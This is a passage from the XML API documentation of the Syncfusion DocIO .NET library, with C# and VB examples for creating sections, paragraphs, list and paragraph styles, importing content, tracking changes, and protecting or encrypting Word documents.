            Represents a Word document and can be used to create a new Word document from the scratch.
            </summary>
            <example>
            <code lang="C#">
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                //Add a new section into the Word document
                IWSection section = document.AddSection();
                //Specify the page margins
                section.PageSetup.Margins.All = 50f;
                //Add a new simple paragraph into the section
                IWParagraph paragraph = section.AddParagraph();
                //Add a text range into the paragraph
                paragraph.AppendText("Hello World!");
                //Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx);
                //Release the resources occupied by WordDocument instance
                document.Close();
            </code>
            <code lang="VB">
                'Create an instance of WordDocument class
                Dim document As New WordDocument()
                'Add a new section into the Word document
                Dim section As IWSection = document.AddSection()
                'Specify the page margins
                section.PageSetup.Margins.All = 50F
                'Add a new simple paragraph into the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add a text range into the paragraph
                paragraph.AppendText("Hello World!")
                'Save the document in the given name and format
                document.Save("Document.docx", FormatType.Docx)
                'Release the resources occupied by WordDocument instance
                document.Close()
            </code>
            </example>    
            <seealso cref="T:Syncfusion.DocIO.DLS.WSection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.IWParagraph"/>
            <see cref="T:Syncfusion.DocIO.DLS.IWTextRange"/>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IWordDocument">
            <summary>
            Represents a Word document and can be used to create a new Word document from the scratch.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.CreateParagraph">
            <summary>
            Creates a new paragraph.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWParagraph"/> this method created.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.EnsureMinimal">
            <summary>
            Adds a single <see cref="T:Syncfusion.DocIO.DLS.IWSection"/> with one <see cref="T:Syncfusion.DocIO.DLS.IWParagraph"/>, when the document contains no sections.
            </summary>
            <example>
            <para>The following code example demonstrates how to add new section with one paragraph to the empty Word document</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Creates a new Word document.
                WordDocument document = new WordDocument();
                //Add a section and a paragraph in the empty document
                document.EnsureMinimal();
                IWParagraph paragraph = document.LastParagraph;
                //Append text to the last paragraph of the document
                paragraph.AppendText("Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua");
                //Save and close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Creates a new Word document.
                Dim document As New WordDocument()
                'Add a section and a paragraph in the empty document
                document.EnsureMinimal()
                Dim paragraph As IWParagraph = document.LastParagraph
                'Append text to the last paragraph of the document
                paragraph.AppendText("Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua")
                'Save and close the Word document
                document.Save("Comment.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.AddSection">
            <summary>
            Adds a new section to document.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWSection"/> this method creates.</returns>
            <example>
            <para>The following code example demonstrates how to add a new section to document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Append the text to the created paragraph
                paragraph.AppendText("A new section is added to the document.");
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Append the text to the created paragraph
                paragraph.AppendText("A new section is added to the document.")
                'Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.AddParagraphStyle(System.String)">
            <summary>
            Adds a new paragraph style to the document.
            </summary>
            <param name="styleName">A String that contains the name of the newly created <see cref="T:Syncfusion.DocIO.DLS.IWParagraphStyle"/></param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWParagraphStyle"/> this method creates.</returns>
            <example>
            <para>The following code example demonstrates how to create a custom paragraph style and apply it to a paragraph.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                
                //Create user defined style
                IWParagraphStyle style = document.AddParagraphStyle("User_defined_style");
                style.ParagraphFormat.BackColor = Color.LightGray;
                style.ParagraphFormat.AfterSpacing = 18f;
                style.ParagraphFormat.BeforeSpacing = 18f;
                style.ParagraphFormat.Borders.BorderType = Syncfusion.DocIO.DLS.BorderStyle.DotDash;
                style.ParagraphFormat.Borders.LineWidth = 0.5f;
                style.ParagraphFormat.LineSpacing = 15f;
                style.CharacterFormat.FontName = "Calibri";
                style.CharacterFormat.Italic = true;
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                IWTextRange text = paragraph.AppendText("A new paragraph style is created and is applied to this paragraph.");
                //Apply the new style to paragraph
                paragraph.ApplyStyle("User_defined_style");
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Create user defined style
                Dim style As IWParagraphStyle = document.AddParagraphStyle("User_defined_style")
                style.ParagraphFormat.BackColor = Color.LightGray
                style.ParagraphFormat.AfterSpacing = 18.0F
                style.ParagraphFormat.BeforeSpacing = 18.0F
                style.ParagraphFormat.Borders.BorderType = Syncfusion.DocIO.DLS.BorderStyle.DotDash
                style.ParagraphFormat.Borders.LineWidth = 0.5F
                style.ParagraphFormat.LineSpacing = 15.0F
                style.CharacterFormat.FontName = "Calibri"
                style.CharacterFormat.Italic = True
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                Dim text As IWTextRange = paragraph.AppendText("A new paragraph style is created and is applied to this paragraph.")
                'Apply the new style to paragraph
                paragraph.ApplyStyle("User_defined_style")
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.IWParagraphStyle"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WParagraphStyle"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.StyleType"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WParagraph"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.AddListStyle(Syncfusion.DocIO.DLS.ListType,System.String)">
            <summary>
            Adds new list style to document.
            </summary>
            <param name="listType">The <see cref="T:Syncfusion.DocIO.DLS.ListType"/> of the new <see cref="T:Syncfusion.DocIO.DLS.ListStyle"/> created.</param>
            <param name="styleName">A String that contains the name of the newly added list style.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.ListStyle"/> this method creates.</returns>
            <example>
            <para>The following code example demonstrates how to how to create user defined list styles.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection(); 
                //Add new list style to the document          
                ListStyle listStyle = document.AddListStyle(ListType.Numbered, "UserdefinedList");
                WListLevel levelOne = listStyle.Levels[0];
                //Define the follow character, prefix, suffix, start index for level 0
                levelOne.FollowCharacter = FollowCharacterType.Tab;
                levelOne.NumberPrefix = "(";
                levelOne.NumberSufix = ")";
                levelOne.PatternType = ListPatternType.LowRoman;
                levelOne.StartAt = 1;
                levelOne.TabSpaceAfter = 5;
                levelOne.NumberAlignment = ListNumberAlignment.Center;
                WListLevel levelTwo = listStyle.Levels[1];
                //Define the follow character, suffix, pattern, start index for level 1
                levelTwo.FollowCharacter = FollowCharacterType.Tab;
                levelTwo.NumberSufix = "}";
                levelTwo.PatternType = ListPatternType.LowLetter;
                levelTwo.StartAt = 2; 
                
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();  
                //Add text to the paragraph
                paragraph.AppendText("User defined list - Level 0");
                //Apply default numbered list style
                paragraph.ListFormat.ApplyStyle("UserdefinedList");
                //Add second paragraph
                paragraph = section.AddParagraph();
                paragraph.AppendText("User defined list - Level 1");
                //Continue last defined list
                paragraph.ListFormat.ContinueListNumbering();
                //Increase the level indent
                paragraph.ListFormat.IncreaseIndentLevel();
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new list style to the document          
                Dim listStyle As ListStyle = document.AddListStyle(ListType.Numbered, "UserdefinedList")
                Dim levelOne As WListLevel = listStyle.Levels(0)
                'Define the follow character, prefix, suffix, start index for level 0
                levelOne.FollowCharacter = FollowCharacterType.Tab
                levelOne.NumberPrefix = "("
                levelOne.NumberSufix = ")"
                levelOne.PatternType = ListPatternType.LowRoman
                levelOne.StartAt = 1
                levelOne.TabSpaceAfter = 5
                levelOne.NumberAlignment = ListNumberAlignment.Center
                Dim levelTwo As WListLevel = listStyle.Levels(1)
                'Define the follow character, suffix, pattern, start index for level 1
                levelTwo.FollowCharacter = FollowCharacterType.Tab
                levelTwo.NumberSufix = "}"
                levelTwo.PatternType = ListPatternType.LowLetter
                levelTwo.StartAt = 2
                
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add text to the paragraph
                paragraph.AppendText("User defined list - Level 0")
                'Apply default numbered list style
                paragraph.ListFormat.ApplyStyle("UserdefinedList")
                'Add second paragraph
                paragraph = section.AddParagraph()
                paragraph.AppendText("User defined list - Level 1")
                'Continue last defined list
                paragraph.ListFormat.ContinueListNumbering()
                'Increase the level indent
                paragraph.ListFormat.IncreaseIndentLevel()
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.ListStyle"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.ListType"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WListLevel"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WParagraph"/>
            <seealso cref="P:Syncfusion.DocIO.DLS.WParagraph.ListFormat"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.GetText">
            <summary>
            Returns a string that contains whole document content as text.
            </summary>
            <returns>The text this document contains.</returns>
            <remarks>This method is not supported in Silverlight, Windows Phone and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to retrieve the Word document contents as a plain text.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx");
                //Get the document text
                string text = document.GetText();
                //Create new Word document
                WordDocument newdocument = new WordDocument();
                //Add new section
                IWSection section = newdocument.AddSection();
                //Add new paragraph
                IWParagraph paragraph = section.AddParagraph();
                //Append the text to the paragraph
                paragraph.AppendText(text);
                //Save and close the document
                newdocument.Save("Sample.docx");
                newdocument.Close();
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx")
                'Get the document text
                Dim text As String = document.GetText()
                'Create new Word document
                Dim newdocument As New WordDocument()
                'Add new section
                Dim section As IWSection = newdocument.AddSection()
                'Add new paragraph
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Append the text to the paragraph
                paragraph.AppendText(text)
                'Save and close the document
                newdocument.Save("Sample.docx")
                newdocument.Close()
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Clone">
            <summary>
            Creates the duplicate copy of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> this method duplicated.</returns>
            <example>
            <para>The following code example demonstrates how to clone the Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open an existing document 
                WordDocument inputTemplateDoc = new WordDocument(fileName);
                //Create a clone of Input Template 
                WordDocument clonedDocument = inputTemplateDoc.Clone();
                //Save and Close the cloned document instance
                clonedDocument.Save("ClonedDocument.docx");
                clonedDocument.Close();
                //Close the input template document instance
                sourceDocument.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open an existing document 
                Dim inputTemplateDoc As New WordDocument(fileName)
                'Create a clone of Input Template 
                Dim clonedDocument As WordDocument = inputTemplateDoc.Clone()
                'Save and Close the cloned document instance
                clonedDocument.Save("ClonedDocument.docx")
                clonedDocument.Close()
                'Close the input template document instance
                sourceDocument.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.ImportSection(Syncfusion.DocIO.DLS.IWSection)">
            <summary>
            Imports the specified section into the current document.
            </summary>
            <param name="section">The source <see cref="T:Syncfusion.DocIO.DLS.IWSection"/> whose contents are appended at the end of the current <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
            <example>
            <para>The following code example demonstrates how to import the section into the Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open the source document 
                WordDocument sourceDocument = new WordDocument(sourceFileName);
                //Open the destination document 
                WordDocument destinationDocument = new WordDocument(targetFileName);
                //Import the last section of source document at the end of destination document
                destinationDocument.ImportSection(sourceDocument.LastSection);
                //Save the destination document
                destinationDocument.Save(outputFileName, FormatType.Docx);
                //close the document instances
                sourceDocument.Close();
                destinationDocument.Close();   
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open the source document 
                Dim sourceDocument As New WordDocument(sourceFileName)
                'Open the destination document 
                Dim destinationDocument As New WordDocument(targetFileName)
                'Import the last section of source document at the end of destination document
                destinationDocument.ImportSection(sourceDocument.LastSection)
                'Save the destination document
                destinationDocument.Save(outputFileName, FormatType.Docx)
                'close the document instances
                sourceDocument.Close()
                destinationDocument.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.ImportContent(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Import contents and styles from the source document to the destination document.
            </summary>
            <param name="doc">The source <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> whose contents are appended at the end of the current <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
            <remarks>When source and destination documents have styles with the same names, then Guid is added as a suffix to the name of the imported styles in the destination document. Due to the above duplication of the same style will increase the file size of the document and also it may lead to Out of memory exception if the machine has some limited amount memory.
            <para>To resolve the duplication of the same style from source to destination document, use <c>ImportContent(IWordDocument doc, bool importStyles)</c> methods with false value for "importStyle" parameter.</para></remarks>
            <example>
            <para>The following code example demonstrates how to import the contents from source document into destination document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open the source document 
                WordDocument sourceDocument = new WordDocument(sourceFileName);
                //Open the destination document 
                WordDocument destinationDocument = new WordDocument(targetFileName);
                //Import the contents of source document at the end of destination document
                destinationDocument.ImportContent(sourceDocument);
                //Save the destination document
                destinationDocument.Save(outputFileName, FormatType.Docx);
                //close the document instances
                sourceDocument.Close();
                destinationDocument.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open the source document 
                Dim sourceDocument As New WordDocument(sourceFileName)
                'Open the destination document 
                Dim destinationDocument As New WordDocument(targetFileName)
                'Import the contents of source document at the end of destination document
                destinationDocument.ImportContent(sourceDocument)
                'Save the destination document
                destinationDocument.Save(outputFileName, FormatType.Docx)
                'close the document instances
                sourceDocument.Close()
                destinationDocument.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.ImportContent(Syncfusion.DocIO.DLS.IWordDocument,Syncfusion.DocIO.DLS.ImportOptions)">
            <summary>
            Import contents from the source document to the destination document with various import options.
            </summary>
            <param name="doc">The source <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> whose contents are appended at the end of the current <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
            <param name="importOptions">The <see cref="T:Syncfusion.DocIO.DLS.ImportOptions"/> that represents the options to import the source document contents to the destination document.</param>
            <remarks>
            <para> <b>Essential DocIO</b> supports the importing contents from the source document to the destination document with various import options similar to Microsoft Word copy and paste options. Following are the import options supported by Essential DocIO.</para>
            <list type="bullet">
            <item><b>KeepSourceFormatting</b>�Imports the contents from the source document, applies the default style (Normal), and preserves all other formatting as direct formatting in order to preserve the contents as in source document. Header and footer contents will be imported similar to the <b>UseDestinationStyles</b> option.</item>
            <item><b>MergeFormatting</b>�Imports the contents of the source document to the destination document, and applies the formatting of surrounding content to the destination document. Merges formatting of the contents surrounding it by preserving some of the source formatting (such as bold, italic, underline, and so on). Header and footer contents are imported similar to the <b>UseDestinationStyles</b> option.</item>
            <item><b>KeepTextOnly</b>�Imports only the text from the source document to the destination document (tables, textboxes, pictures, headers, footers, and so on, are removed), similar to content copied from a text file (.txt).</item>
            <item><b>UseDestinationStyles</b>�Imports the contents of the source document to the destination document, and applies the styles present in the destination document, or imports the source style to the destination document when there is no style with the same name in the destination document.</item>
            </list>
            </remarks>
            <example>
            <para>The following code example demonstrates how to import the contents from source document into destination document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open the source document 
                WordDocument sourceDocument = new WordDocument(sourceFileName);
                //Open the destination document 
                WordDocument destinationDocument = new WordDocument(targetFileName);
                //Import the contents of source document at the end of destination document
                destinationDocument.ImportContent(sourceDocument, ImportOptions.UseDestinationStyles);
                //Save the destination document
                destinationDocument.Save(outputFileName, FormatType.Docx);
                //close the document instances
                sourceDocument.Close();
                destinationDocument.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open the source document 
                Dim sourceDocument As New WordDocument(sourceFileName)
                'Open the destination document 
                Dim destinationDocument As New WordDocument(targetFileName)
                'Import the contents of source document at the end of destination document
                destinationDocument.ImportContent(sourceDocument, ImportOptions.UseDestinationStyles)
                'Save the destination document
                destinationDocument.Save(outputFileName, FormatType.Docx)
                'close the document instances
                sourceDocument.Close()
                destinationDocument.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.ImportContent(Syncfusion.DocIO.DLS.IWordDocument,System.Boolean)">
            <summary>
            Import contents from the source document to the destination document by specifying whether to import styles that have the same name between the source and destination document.
            </summary>
            <param name="doc">The source <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> whose contents are appended at the end of the current <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
            <param name="importStyles">Set to <b>true</b> to import all the styles from the source document to destination document; otherwise, <b>false</b>.</param>
            <remarks>
            <para> When importStyles is set to false, all the contents are imported; but, the styles of the source document with style names that do not match with the styles in the destination document are not imported. When the style names match the destination style names, then the same name is applied to the imported contents. This behavior is similar to the Microsoft Word paste option � UseDestinationStyles.</para>
            <para> When importStyles is set to true, all the contents and styles of the source document are imported to the destination document. In cases where a style in the source document has the same name as a style in the destination document, �Guid� is added as a suffix to the name of the imported style in order to preserve unique style name.  Due to the above duplication of the same style will increase the file size of the document and also it may lead to Out of memory exception if the machine has some limited amount memory.</para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to import the contents from source document into destination document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open the source document 
                WordDocument sourceDocument = new WordDocument(sourceFileName);
                //Open the destination document 
                WordDocument destinationDocument = new WordDocument(targetFileName);
                //Import the contents of source document at the end of destination document
                destinationDocument.ImportContent(sourceDocument, true);
                //Save the destination document
                destinationDocument.Save(outputFileName, FormatType.Docx);
                //close the document instances
                sourceDocument.Close();
                destinationDocument.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open the source document 
                Dim sourceDocument As New WordDocument(sourceFileName)
                'Open the destination document 
                Dim destinationDocument As New WordDocument(targetFileName)
                'Import the contents of source document at the end of destination document
                destinationDocument.ImportContent(sourceDocument, true)
                'Save the destination document
                destinationDocument.Save(outputFileName, FormatType.Docx)
                'close the document instances
                sourceDocument.Close()
                destinationDocument.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.AddStyle(Syncfusion.DocIO.DLS.BuiltinStyle)">
            <summary>
            Adds the built-in style to the <see cref="T:Syncfusion.DocIO.DLS.IStyleCollection"/> collection.
            </summary>
            <param name="builtinStyle">The <see cref="T:Syncfusion.DocIO.DLS.BuiltinStyle"/> that represents the added built-in style of the document.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> this method added to <see cref="T:Syncfusion.DocIO.DLS.IStyleCollection"/> collection.</returns>
            <example>
            <para>The following code example demonstrates how to add the built-in style to the document</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Add the built-in style to the document style collection
                IStyle style = document.AddStyle(BuiltinStyle.Heading5);
                //Apply the added built-in style to the last paragraph of the document
                document.LastParagraph.ApplyStyle(style.Name);
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                'Add the built-in style to the document style collection
                Dim style As IStyle = document.AddStyle(BuiltinStyle.Heading5)
                'Apply the added built-in style to the last paragraph of the document
                document.LastParagraph.ApplyStyle(style.Name)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.AcceptChanges">
            <summary>
            Accepts changes tracked from the moment of last change acceptance.
            </summary>
            <example>
            <para>The following code example demonstrates how to accept the tracked changes in the document</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Check whether document has tracked changes
                if (document.HasChanges)
                    //Accept the changes made to the document
                    document.AcceptChanges();
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                'Check whether document has tracked changes
                If document.HasChanges Then
                	'Accept the changes made to the document
                	document.AcceptChanges()
                End If
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.RejectChanges">
            <summary>
            Rejects changes tracked from the moment of last change acceptance.
            </summary>
            <example>
            <para>The following code example demonstrates how to reject the tracked changes in the document</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Check whether document has tracked changes
                if (document.HasChanges)
                    //Reject the changes made to the document
                    document.RejectChanges();
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                'Check whether document has tracked changes
                If document.HasChanges Then
                	'Reject the changes made to the document
                	document.RejectChanges()
                End If
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Protect(Syncfusion.DocIO.ProtectionType)">
            <summary>
            Protects the document from unintentional editing.
            </summary>
            <param name="type">The type of protection to be applied.</param>
            <example>
            <para>The following code example demonstrates how to protect the document from unintentional editing.</para>
            <remarks>This method is not supported in MVC6 and Xamarin platforms.</remarks>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Apply the protection to the document
                document.Protect(ProtectionType.AllowOnlyComments);
                //Save and close the document instances
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                'Apply the protection to the document
                document.Protect(ProtectionType.AllowOnlyComments)
                'Save and close the document instances
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Protect(Syncfusion.DocIO.ProtectionType,System.String)">
            <summary>
            Protects the document from unintentional editing with secure password.
            </summary>
            <param name="type">The type of protection to be applied.</param>
            <param name="password">The password used for protection.</param>
            <remarks>This method is not supported in MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to protect the document from unintentional editing.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx", "password");
                //Apply the protection to the document
                document.Protect(ProtectionType.AllowOnlyComments);
                //Save and close the document instances
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                'Apply the protection to the document
                document.Protect(ProtectionType.AllowOnlyComments, "password")
                'Save and close the document instances
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.EncryptDocument(System.String)">
            <summary>
            Protects the document with password from unauthorized access.
            </summary>
            <param name="password">A String used to encrypt the document.</param>
            <remarks>This method is not supported in MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to encrypt the Word document with password.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open an input Word document
                WordDocument document = new WordDocument(�Template.docx�);
                //Encrypt the Word document with a password
                document.EncryptDocument("password");
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open an input Word document
                Dim document As New WordDocument("Template.docx")
                'Encrypt the Word document with a password
                document.EncryptDocument("password")
                'Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.RemoveEncryption">
            <summary>
            Removes the encryption from the document.
            </summary>
            <remarks>This method is not supported in MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to remove encrypt from the Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open an input Word document
                WordDocument document = new WordDocument(�Template.docx�);
                //Remove the encryption from document
                document.RemoveEncryption();
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open an input Word document
                Dim document As New WordDocument("Template.docx")
                'Remove the encryption from document
                document.RemoveEncryption();
                'Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.GetCrossReferenceItems(Syncfusion.DocIO.ReferenceType)">
            <summary>
            Gets the list/array of items that can be cross-referenced based on the specified reference type.
            </summary>
            <param name="refernceType">
            Specifies the type of item you want to insert a cross-reference to.
            </param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> collection that represents the cross reference items in the document.</returns>
            <remarks>
            <para>
            This method returns the cross reference of Bookmarks items only.
            </para>
            <para>
            For bookmarks, it returns the entity collections of BookmarkStart only if the bookmark contains proper start and end.
            </para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to append cross reference for bookmark in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Get the collection of bookmark start in the word document
                List&lt;Entity&gt; items = document.GetCrossReferenceItems(ReferenceType.Bookmark);
                if (items.Count &gt; 0)
                    //Change the first cross reference items owner paragraph back color as YelloGreen
                    (items[0] as BookmarkStart).OwnerParagraph.ParagraphFormat.BackColor = Color.YellowGreen;
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
